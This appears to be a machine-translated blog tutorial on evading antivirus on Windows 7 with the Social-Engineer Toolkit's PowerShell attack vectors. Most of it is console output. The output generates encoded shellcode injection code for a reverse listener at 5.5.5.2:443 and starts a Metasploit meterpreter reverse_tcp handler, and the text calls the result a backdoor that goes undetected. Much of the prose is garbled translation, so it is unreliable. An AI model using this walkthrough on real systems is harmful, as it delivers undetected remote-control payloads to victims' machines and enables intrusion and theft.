Set: Windows7 Bypassing using Powershell

Windows PowerShell is a command line shell program and script environment that allows command line users and script writers to take advantage of the powerful functions of the. NET Framework. It introduces many useful new concepts to further expand your knowledge and scripts created in the Windows Command Prompt and Windows Script Host environment.
With Windows PowerShell, you can easily enter commands in interactive mode to create and run scripts. You can enter a command at the Windows PowerShell command prompt to find the command that can execute the task. You can then save these commands to scripts or history records and copy them to a file to use them as scripts.
Identify the Provider you are about to use. by identifying the Provider installed in PowerShell, you can understand what capabilities PowerShell provides by default. The Provider can use a simple access method to expose data in different storage locations. It is as simple as browsing the directory structure on different disks. The Provider stores different information in locations and expresses it as a "Drive"-directory structure, which is easy to understand. Just as we want to upload the setup.exe file under the win32directory of the d Drive, We need to click the icon of the d drive through the browser, then select the WIN32 Directory and double-click the same, if we want to access the data in the "Registry, then we just need to simply go to the REGISTRY drive through the Set-Location command, and then get its sub-data with the GET-CHILDITEM command.

At the Bsides Security Conference, the confident fat man David-the author of your father SET showed some new methods to bypass anti-virus using Powershell.

Update set

root@Dis9Team:/pen/set# svn update

Select1) Social-Engineering AttacksThen select10) Powershell Attack Vectors

Select the door type here

1) Powershell Alphanumeric Shellcode Injector   2) Powershell Reverse Shell   3) Powershell Bind Shell   4) Powershell Dump SAM Database

Select 11) Powershell Alphanumeric Shellcode Injector

 

Then wait for his encoding. SET is always 32 64-bit.
 
Set: powershell> 1
Set> IP address for the payload listener: 5.5.5.2
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
Enter the port number for the reverse [443]:
[*] Generating x64-based powershell injection code...
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection attack and is encoded to bypass execution restriction...
Set> Do you want to start the listener now [yes/no]: yes
Set: powershell> Select x86 or x64 victim machine [default: x64]: x64
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***
 
Call trans opt: received. 2-19-98 13:24:18 REC: Loc
 
Trace program: running
 
Wake up, Neo...
The matrix has you
Follow the white rabbit.
 
Knock, knock, Neo.
 
('.,-,
''.,;'/
'.,'/.'
'. X /.'
.-;--''--.._''(
.'/'
, ''Q'
,,'._\
,. | ''-.;_'
:.';''--,.._;
'',).'
'._,'/_
;,''-,;'''-
''-..__''--'
 
 
= [Metasploit v4.4.0-release [core: 4.4 api: 1.0]
+ -- = [914 exploits-527 auxiliary-150 post
+ -- = [250 payloads-28 encoders-8 nops
= [Svn r15684 updated 9 days ago (2012.07.26)
 
Warning: This copy of the Metasploit Framework was last updated 9 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
 
Https://community.rapid7.com/docs/DOC-1306
 
[*] Processing reports/powershell. rc for ERB ctictives.
Resource (reports/powershell. rc)> use multi/handler
Resource (reports/powershell. rc)> set payload windows/x64/meterpreter/reverse_tcp
Payload => windows/x64/meterpreter/reverse_tcp
Resource (reports/powershell. rc)> set lport 443
Lport => 443
Resource (reports/powershell. rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
Resource (reports/powershell. rc)> exploit-j
[*] Exploit running as background job.
Msf exploit (handler)>
[*] Started reverse handler on 0.0.0.0: 443
[*] Starting the payload handler...
The generated backdoor is saved here.
 
Root @ Dis9Team:/pen/set/reports/powershell # pwd
/Pen/set/reports/powershell
Root @ Dis9Team:/pen/set/reports/powershell # ls
Powershell. rc x64_powershell_injection.txt x86_powershell_injection.txt
Root @ Dis9Team:/pen/set/reports/powershell # cat x64_powershell_injection.txt
..............
-------- Ignore ----
Root @ Dis9Team:/pen/set/reports/powershell #



 

Select the run X86 OR X64 of the social media and your system.

No pressure on Jinshan 360 after Operation

References
Http://www.secmaniac.com/files/PowerShell_Defcon.pdf
Http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html
Http://www.exploit-monday.com/2011/11/powersyringe-powershell-based-codedll.html
Http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
Http://www.obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html
Http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx